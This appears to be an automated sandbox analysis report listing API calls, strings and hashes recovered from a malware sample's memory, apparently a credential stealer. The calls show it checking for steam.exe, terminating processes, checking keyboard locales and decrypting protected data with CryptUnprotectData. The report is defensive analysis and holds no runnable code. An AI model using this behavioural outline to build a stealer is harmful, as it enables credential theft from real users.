                                   • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                  • String ID: \*.*
                                  • API String ID: 2567437900-1173974218
                                  • Opcode ID: 0196e1542cad807e24cf49cd10fcccd698c44afd58dfb47ecaa2ca464b84a9cf
                                  • Instruction ID: b316a346256e3acb0a9a322947c6485d4e63284549871209c6d985a47fd81ce0
                                  • Opcode Fuzzy Hash: 0196e1542cad807e24cf49cd10fcccd698c44afd58dfb47ecaa2ca464b84a9cf
                                  • Instruction Fuzzy Hash: E8413C715116159BCB23AF28EC85A9F77E4AF15301F855124BC4AAF221CF30AC599BA0
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 003646B9
                                  • Process32First.KERNEL32(00000000,00000128), ref: 003646C9
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 003646DB
                                  • StrCmpCA.SHLWAPI(?,?), ref: 003646ED
                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00364702
                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 00364711
                                  • CloseHandle.KERNEL32(00000000), ref: 00364718
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 00364726
                                  • CloseHandle.KERNEL32(00000000), ref: 00364731
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                   • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                  • String ID:
                                  • API String ID: 3836391474-0
                                  • Opcode ID: b62f3d3c2bcc958c9c5693f9e23dea815712c3c622f4731397fb4ab822ebe6ce
                                  • Instruction ID: a02898a53e5fb8eaf638668b48745e2632d7f6f25da68e63399aa4f8f52f25db
                                  • Opcode Fuzzy Hash: b62f3d3c2bcc958c9c5693f9e23dea815712c3c622f4731397fb4ab822ebe6ce
                                  • Instruction Fuzzy Hash: CF016D31A51124ABE7225B60EC8DFFA377CAB5AB11F040198F90992184EF749988AA71
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 00364628
                                  • Process32First.KERNEL32(00000000,00000128), ref: 00364638
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 0036464A
                                  • StrCmpCA.SHLWAPI(?,steam.exe), ref: 00364660
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 00364672
                                  • CloseHandle.KERNEL32(00000000), ref: 0036467D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                   • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                                  • String ID: steam.exe
                                  • API String ID: 2284531361-2826358650
                                  • Opcode ID: c5423b6b5d9c628c77c9b61473a7883ac45e872d091b6616f3f11ea77cd998f7
                                  • Instruction ID: 96e40c0870460497f03ff09648c7842d15b7af4213db7df29b8d29d03044d48c
                                  • Opcode Fuzzy Hash: c5423b6b5d9c628c77c9b61473a7883ac45e872d091b6616f3f11ea77cd998f7
                                  • Instruction Fuzzy Hash: 2301A271A011249BD7219F60EC4CFEA77BCEF19350F0001D5E90DD1040EFB48998ABE1
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 00354B51
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00354B74
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00354B7F
                                  • lstrlen.KERNEL32(00374CA8), ref: 00354B8A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00354BA7
                                  • lstrcat.KERNEL32(00000000,00374CA8), ref: 00354BB3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00354BDE
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 00354BFA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                   • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                  • String ID:
                                  • API String ID: 2567437900-0
                                  • Opcode ID: 5a4b4ddada2892ffb41ac9cca82cc86e353ad0a6e7474098406f9e94d7ec11e0
                                  • Instruction ID: 0ea20d19d4d9787d574f3417969de94eda6c871c7711cdff201957f353bfb2ce
                                  • Opcode Fuzzy Hash: 5a4b4ddada2892ffb41ac9cca82cc86e353ad0a6e7474098406f9e94d7ec11e0
                                  • Instruction Fuzzy Hash: 50313B315211169BCB27EF24EC89E9F77E5AF54315F414124FC49AF221CB30EC659BA0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                   • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: zy;$ N$B$[RKZ$f5y$j5y$p"e'$z",;$3q}
                                  • API String ID: 0-842368873
                                  • Opcode ID: 715d09f02b72b95d84899bb4230536faaae57995b046b51d50edff26fcbf0b01
                                  • Instruction ID: 38592469df958eb5c2121748800335b9eed827ee07ce4156b3efd808206d2bb6
                                  • Opcode Fuzzy Hash: 715d09f02b72b95d84899bb4230536faaae57995b046b51d50edff26fcbf0b01
                                  • Instruction Fuzzy Hash: 26B206F3A0C6149FE3046E29EC8567AFBE5EF94720F16493DEAC4C7344EA3558058693
                                  APIs
                                    • Part of subcall function 003671E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 003671FE
                                  • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00362D9B
                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 00362DAD
                                  • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00362DBA
                                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00362DEC
                                  • LocalFree.KERNEL32(00000000), ref: 00362FCA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Similarity
                                  • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                  • String ID: /
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: GO$J{'$[kg$u`]$*#H$8;q$>:
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: !U|w$/G~z$?^[_$Jm_$RPo$]w?_$]w?_
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: "Smu$&aUs$)^{$)^{$7R|$S*_$T~vv
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00362C42
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00362C49
                                  • GetTimeZoneInformation.KERNEL32(?), ref: 00362C58
                                  • wsprintfA.USER32 ref: 00362C83
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Similarity
                                  • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                  • String ID: wwww
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $fo3$2Zx{$AGw$K1~7$d[=
                                  APIs
                                  • GetSystemTime.KERNEL32(?), ref: 00361B72
                                    • Part of subcall function 00361820: lstrcpy.KERNEL32(00000000,0036CFEC), ref: 0036184F
                                    • Part of subcall function 00361820: lstrlen.KERNEL32(00F96080), ref: 00361860
                                    • Part of subcall function 00361820: lstrcpy.KERNEL32(00000000,00000000), ref: 00361887
                                    • Part of subcall function 00361820: lstrcat.KERNEL32(00000000,00000000), ref: 00361892
                                    • Part of subcall function 00361820: lstrcpy.KERNEL32(00000000,00000000), ref: 003618C1
                                    • Part of subcall function 00361820: lstrlen.KERNEL32(00374FA0), ref: 003618D3
                                    • Part of subcall function 00361820: lstrcpy.KERNEL32(00000000,00000000), ref: 003618F4
                                    • Part of subcall function 00361820: lstrcat.KERNEL32(00000000,00374FA0), ref: 00361900
                                    • Part of subcall function 00361820: lstrcpy.KERNEL32(00000000,00000000), ref: 0036192F
                                  • sscanf.NTDLL ref: 00361B9A
                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00361BB6
                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00361BC6
                                  • ExitProcess.KERNEL32 ref: 00361BE3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Similarity
                                  • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                                  • String ID:
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0034775E
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00347765
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0034778D
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 003477AD
                                  • LocalFree.KERNEL32(?), ref: 003477B7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Similarity
                                  • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                  • String ID:
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: >-4[$G+W$Zeo$vw
                                  • API String ID: 0-3707004711
                                  • Opcode ID: 8cc34feeb77ab94651c488906d4482f9d4c5241086beaed8d8f3377c70f27689
                                  • Instruction ID: e753d9443d39b9f47c7fd3a551deac6a60c0d72448c5cc874ee533ee9d385189
                                  • Opcode Fuzzy Hash: 8cc34feeb77ab94651c488906d4482f9d4c5241086beaed8d8f3377c70f27689
                                  • Instruction Fuzzy Hash: 0BB236F3A0C2049FE304AE2DEC8567AB7E5EF94720F1A893DEAC4C7744E63559018697
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                   • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $#o$2fVm$Cb|?$pT|
                                  • API String ID: 0-3701734100
                                  • Opcode ID: 2f5df29753d988f60c5fc98793652b7d3addb8bc1bd421abd7ce2684f36de281
                                  • Instruction ID: 4f627264aa4d23c200270f40717e27818655f01a5badc335b643fb5f08e9cda5
                                  • Opcode Fuzzy Hash: 2f5df29753d988f60c5fc98793652b7d3addb8bc1bd421abd7ce2684f36de281
                                  • Instruction Fuzzy Hash: 2EB239F3A082049FE3046E2DEC9577AB7E9EFD4720F1A463DEAC4C3744EA3558058696
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                   • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: ,#rq$/<u$<+c?$coNq
                                  • API String ID: 0-4260325508
                                  • Opcode ID: d4d0db0f03eb0630bb7df013bef42e9238dc47918bfff3a3fb3a88e1cd85f6d9
                                  • Instruction ID: 42d6ef1eeb833669e26e06be63889470e23ac2a5ce78fec341563935faa657b3
                                  • Opcode Fuzzy Hash: d4d0db0f03eb0630bb7df013bef42e9238dc47918bfff3a3fb3a88e1cd85f6d9
                                  • Instruction Fuzzy Hash: C6A2D3F360C204AFE704AE2DEC8567ABBE9EF94720F16492DE6C4C3740EA3558458797
                                  APIs
                                    • Part of subcall function 003671E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 003671FE
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00363A96
                                  • Process32First.KERNEL32(00000000,00000128), ref: 00363AA9
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 00363ABF
                                    • Part of subcall function 00367310: lstrlen.KERNEL32(------,00345BEB), ref: 0036731B
                                    • Part of subcall function 00367310: lstrcpy.KERNEL32(00000000), ref: 0036733F
                                    • Part of subcall function 00367310: lstrcat.KERNEL32(?,------), ref: 00367349
                                    • Part of subcall function 00367280: lstrcpy.KERNEL32(00000000), ref: 003672AE
                                  • CloseHandle.KERNEL32(00000000), ref: 00363BF7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                   • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                  • String ID:
                                  • API String ID: 1066202413-0
                                  • Opcode ID: c7d496f4338e113b4a17d737c685ef508e6baacc27799c31982130d3bfef9fd8
                                  • Instruction ID: 734b326e3cbb6ab89351072e1ad0fd601a3318d5d512e2efb7d4738914e2ece6
                                  • Opcode Fuzzy Hash: c7d496f4338e113b4a17d737c685ef508e6baacc27799c31982130d3bfef9fd8
                                  • Instruction Fuzzy Hash: FB81F230905204CFC716CF18D888BA5B7F1FB45328F2AC1A9E4099B2A6D7769D86DF90
                                  APIs
                                  • lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 0034EA76
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 0034EA7E
                                  • lstrcat.KERNEL32(0036CFEC,0036CFEC), ref: 0034EB27
                                  • lstrcat.KERNEL32(0036CFEC,0036CFEC), ref: 0034EB49
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                   • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$BinaryCryptStringlstrlen
                                  • String ID:
                                  • API String ID: 189259977-0
                                  • Opcode ID: 1dfaf494a477801e24c0b7276af0afbedd31c5b95543d489cf00e3e6b9a58457
                                  • Instruction ID: e6ba2a6c932b52090bf8a2708ad7344a8a181d2dd62360f068af77e596768896
                                  • Opcode Fuzzy Hash: 1dfaf494a477801e24c0b7276af0afbedd31c5b95543d489cf00e3e6b9a58457
                                  • Instruction Fuzzy Hash: B9310775A14219ABDB109B58EC49FFFBB7DEF44701F0041A5F90DE7240DBB05A489BA2
                                  APIs
